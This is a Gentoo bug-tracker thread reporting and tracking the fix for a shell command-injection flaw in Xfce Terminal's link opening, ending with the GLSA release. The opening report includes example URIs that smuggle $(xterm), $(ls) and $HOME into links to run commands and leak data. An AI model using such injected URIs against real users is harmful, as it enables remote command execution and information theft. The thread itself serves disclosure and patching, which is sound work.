Clicking "Open Link" on a malicious link may leak information or allow remote shell command execution because Xfce Terminal uses /bin/sh -c with gdk_spawn_on_screen for running the browser, with no proper escaping in the URI. A recommended fix would be to use the execvp(2) series functions with no shell, but the upstream does not want to fix this (I have notified Benny of this issue in Nov 2006). Example URIs: http://foo.bar/$(xterm)/ - remote command execution http://google.com/search?q=$(ls)&sourceid=b0rk - used for stealing information http://google.com/search?q=$HOME - examine environment The behavior of these may vary depending on the browser chosen. I can verify the current results on two computers with the default setting "Mozilla Firefox" chosen, using xfce-extra/terminal-0.2.6-r1.
Could you link us to the upstream bug you have opened?
I have not, as I don't have an account on their Bugzilla. I reported it by email.
setting status. Xfce, please keep us informed when upstream releases a fix for this.
(In reply to comment #3) > setting status. Xfce, please keep us informed when upstream releases a fix for > this. > Fixed in upstream trunk. Expect a patch tomorrow.
*terminal-0.2.6_p25931 (21 Jul 2007) 21 Jul 2007; Samuli Suominen <drac@gentoo.org> +terminal-0.2.6_p25931.ebuild: Snapshot to fix security bug 184886, remote shell command execution.
thanks Samuli. Arches, please test and mark stable xfce-extra/terminal-0.2.6_p25931. target keywords are: "alpha amd64 arm hppa ia64 mips ppc ppc64 sparc x86 ~x86-fbsd"
amd64 stable
Stable for HPPA.
On Alpha: 1. Compiles fine 2. Passes collision test 3. Works nice with no URL exploit Terminal 0.2.7svn-25931 (Xfce 4.4.1) Portage 2.1.2.9 (default-linux/alpha/2007.0/desktop, gcc-4.1.2, glibc-2.5-r4, 2.6.21-gentoo-r4 alpha) ================================================================= System uname: 2.6.21-gentoo-r4 alpha EV56 Gentoo Base System release 1.12.9 Timestamp of tree: Sat, 21 Jul 2007 13:50:01 +0000 ccache version 2.4 [enabled] dev-lang/python: 2.4.4-r4 dev-python/pycrypto: 2.0.1-r5 dev-util/ccache: 2.4-r7 sys-apps/sandbox: 1.2.18.1 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.17.50.0.16 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.23b virtual/os-headers: 2.6.17-r2 ACCEPT_KEYWORDS="alpha" AUTOCLEAN="yes" CBUILD="alpha-unknown-linux-gnu" CFLAGS="-mieee -pipe -O2 -mcpu=ev5" CHOST="alpha-unknown-linux-gnu" CONFIG_PROTECT="/etc /usr/share/X11/xkb" CONFIG_PROTECT_MASK="/etc/env.d /etc/gconf /etc/revdep-rebuild /etc/terminfo" CXXFLAGS="-mieee -pipe -O2 -mcpu=ev5" DISTDIR="/usr/portage/distfiles" FEATURES="ccache distlocks metadata-transfer parallel-fetch sandbox sfperms strict" GENTOO_MIRRORS="http://distfiles.gentoo.org http://distro.ibiblio.org/pub/linux/distributions/gentoo" LINGUAS="en" MAKEOPTS="-j2" PKGDIR="/usr/portage/packages" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --filter=H_**/files/digest-*" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" PORTDIR_OVERLAY="/usr/portage/local/layman/berkano" SYNC="rsync://rsync.namerica.gentoo.org/gentoo-portage" USE="X acl alpha alsa berkdb bitmap-fonts bzip2 cairo cdr cli cracklib crypt cups curl dbus dri dvd dvdr dvdread encode evo fam fortran gdbm gif gpm gtk hal iconv ipv6 isdnlog jpeg libg++ libnotify mad midi mikmod mp3 mpeg mudflap ncurses nls nptl nptlonly ogg opengl openmp oss pam pcre pdf perl png pppd python qt3 qt3support qt4 quicktime readline reflection sdl session spell spl ssl startup-notification svg tcpd tiff truetype truetype-fonts type1-fonts unicode vorbis xml xorg xv zlib" ALSA_CARDS="ali5451 als4000 bt87x ca0106 cmipci emu10k1 ens1370 ens1371 es1938 es1968 fm801 hda-intel intel8x0 maestro3 trident usb-audio via82xx ymfpci" ALSA_PCM_PLUGINS="adpcm alaw asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa lfloat linear meter mulaw multi null plug rate route share shm softvol" ELIBC="glibc" INPUT_DEVICES="keyboard evdev mouse joystick" KERNEL="linux" LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LINGUAS="en" USERLAND="GNU" VIDEO_CARDS="radeon vga fbdev" Unset: CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS
alpha/ia64/x86 stable, thanks Brian
arm done
sparc stable.
ppc64 stable
ppc stable, ready for glsa
zzzz..
(In reply to comment #15) > zzzz.. I don't know if this comment is for to the security team, but just so you know, we've got about 130 open bugs which need some attention, plus 20 glsas in the pool waiting to be drafted/reviewed/sent. I'm doing as much as I can, but security team is clearly understaffed to achieve all this work in a timely manner, so if you wanna join us and help out, you're welcome :)
mips stable.
it's GLSA 200708-07, thanks everybody and sorry for the delay.
